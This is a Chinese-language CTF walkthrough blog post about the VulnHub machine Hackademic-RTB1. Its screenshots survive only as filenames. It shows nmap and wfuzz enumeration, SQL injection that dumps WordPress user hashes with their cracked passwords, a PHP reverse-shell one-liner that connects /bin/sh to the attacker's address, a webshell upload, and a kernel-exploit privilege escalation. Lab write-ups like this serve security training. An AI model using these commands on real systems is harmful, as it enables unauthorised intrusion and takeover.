首页 > 其他分享 >5、Hackademic-RTB1(VulnHub)

5、Hackademic-RTB1(VulnHub)

时间:2024-04-10 12:34:26浏览次数:27  
标签:Hackademic txt 192.168 VulnHub RTB1 php wfuzz

Hackademic-RTB1

一、nmap

image-20240322140410087

扫全端口会爆炸,暂时使用默认先扫描出两个

image-20240322140923405

image-20240322162511188

image-20240322142911428

二、web渗透

随便看看

image-20240322142930159

简单目录爆破

image-20240322140706390

/Hackademic_RTB1/

根据界面提示,我们可以来到这个目录

image-20240322144011844

源码处发现框架

image-20240322144050029

再次目录爆破

image-20240322144109703

wscan扫描

image-20240322144223349

WordPress 1.5.1

image-20240322144848502

searchsploit

image-20240322160147228

/wp-content/plugins/

在目录爆破中发现插件目录,这边尝试通过插件进行渗透

image-20240322144653056

wfuzz

好像都没有东西

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/hello.php?FUZZ=somethings

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/textile1.php?FUZZ=somethings

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/markdown.php?FUZZ=somethings

好像思路都走不通了,我们往回走看看是不是遗漏了什么东西

/Hackademic_RTB1/?p=9

通过点击Got root?!,我们来到了一个新的界面,看url就明白了

image-20240322151108352

sql注入

p参数

没注入,不会吧

image-20240322151157717

image-20240322151211732

cat参数

通过点击Uncategorized,发现有又一个新的界面

image-20240322151300043

确定存在sql注入了

image-20240322151310436

这里是靶场,就直接dump出来咯,实战中可别这样做

image-20240322152324089

NickJames		21232f297a57a5a743894a0e4a801fc3 (admin)
GeorgeMiller	7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)

目录扫描尝试登入后台

成功

image-20240322152650003

这个用户登入进去,发现能做的操作很少,尝试换其他用户登入,GeorgeMiller:q1w2e3

image-20240322160020174

尝试php反弹shell

通过刷新hello.php,还是无法连接

php -r '$sock=fsockopen("192.168.126.201",11111);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20240322160921552

添加上传文件白名单

image-20240322161650993

image-20240322162630823

image-20240322162156686

image-20240322162208227

拿下webshell

image-20240322162243010

三、内网渗透

image-20240322162725744

计划任务

image-20240322163400961

查看版本情况

image-20240322163540273

尝试内核提权漏洞

失败1

image-20240322164103842

image-20240322164130597

失败2

image-20240322164659944

image-20240322164842128

失败3

image-20240322164933593

image-20240322165044393

失败4

由于版本问题通杀提权也失败了

image-20240322170104926

大范围搜索漏洞,只能一个一个试

image-20240322170159214

使用15285.c

image-20240322170502296

image-20240322171012151

image-20240322170618873

内核漏洞提权成功

image-20240322170651295

ket.txt/ket.txt~

image-20240322170736192

标签:Hackademic,txt,192.168,VulnHub,RTB1,php,wfuzz
From: https://www.cnblogs.com/carmi/p/18125771

相关文章

  • 打靶:vulnhub中的SickOS1.1
    靶机下载链接:https://download.vulnhub.com/sickos/sick0s1.1.7z复现视频:【「红队笔记」靶机精讲:SickOS1.1-穿越Squid代理的CMS渗透】https://www.bilibili.com/video/BV1Em4y1A7XX?vd_source=09d322662ec63869ded6328cd2203029解法一靶机安装成功页面,靶机网络要设置成net......
  • Vulnhub靶机——EMPIRE: BREAKOUT
    靶机地址Empire:Breakout~VulnHub渗透关键点(1)tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限(2)backups(备份文件)中存在信息敏感文件渗透思路总结(1)信息收集(端口信息,源码泄露,服务扫描)(2)利用tar文件的特殊权限实现任意文件读取(3)su登录失败则执行反弹shell......
  • Vulnhub之dc-3
    信息收集ip扫描端口扫描80访问目录扫描发现目录administrator这里我用Wappalyzer对他做了指纹识别,发现这个网站是用Joomla这个框架搭建的,这时候我们就要从这个框架身上下手,去寻找框架的漏洞。用到一个Joomla框架的扫描工具--joomscan,kali安装apt-getinstalljo......
  • 17、Connect-the-dots(VulnHub)
    Connect-the-dots一、nmapcatports|grepopen|awk-F'/''{print$1}'|paste-sd','>nmap_open_port_total.txt二、ftp渗透没啥三、web渗透随便看看图片隐写目录爆破没错,web端给我们的提示就是去找备份/backupsbootstrap.min.cs这个是啥c......
  • Vulnhub之Kdc-4
     IP扫描端口扫描80bp爆破adminhappy对command页面进行了下测试,发现这里存在一个命令执行 bp反弹shellkali监听在home/jim发现密码备份文件保存字典爆破ssh登录发现charles用户密码sudo-lteehee提权-隐念笎-博客园(cnblogs.com)......
  • Linux提权——SUID&SUDO(Vulnhub靶机)
    #简述1、SUID提权SUID是Linux中的一中特殊权限,SUID可以让二进制程序的调用者以文件拥有者的身份运行该文件。如果对于一些特殊命令设置了SUID,那么就会有被提权的风险。而这个SUID提权的关键就是,找到root用户所拥有的SUID的文件&命令,运行该文件或者调用命令时,暂时拥有root权限,......
  • Vulnhub之Kdc-5
     一信息收集IP扫描 端口扫描 80  文件包含 目录扫描 访问 漏洞验证 系统是nginx,所以可以查看一下日志信息,nginx日志的默认日志路劲为/var/log/nginx/,一般nginx的日志都有access.log和error.log文件访问 bp拦截 蚁剑连接  反弹sh......
  • 红队笔记10:pWnOS2.0打靶流程-whatweb指纹识别-searchsploit搜索漏洞利用getshell(vulnh
    目录开头:1.主机发现和端口扫描2.80端口- whatweb指纹识别-searchsploit搜索漏洞并利用whatweb指纹识别:searchsploit搜索历史漏洞:什么是perl?SimplePHPblog登录成功-图片上传getshell3.提权-敏感文件泄露密码泄露尝试登录 4.总结:开头:学习的视频是哔哩哔哩红......
  • 权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
    知识点1、Web或用户到Linux-数据库类型2、Web或用户到Linux-Capability能力3、普通用户到Linux-LD_Preload加载so配合sudo章节点:1、Web权限提升及转移2、系统权限提升及转移3、宿主权限提升及转移4、域控权限提升及转移基础点0、为什么我们要学习权限提升转移技......
  • 权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
    知识点1、Web或普通用户到Linux-服务安全配合SUID-NFS2、普通用户到Linux-环境变量配合SUID-$PATH3、Web或普通用户到Linux-计划任务权限不当-Cron章节点:1、Web权限提升及转移2、系统权限提升及转移3、宿主权限提升及转移4、域控权限提升及转移基础点0、为什么我......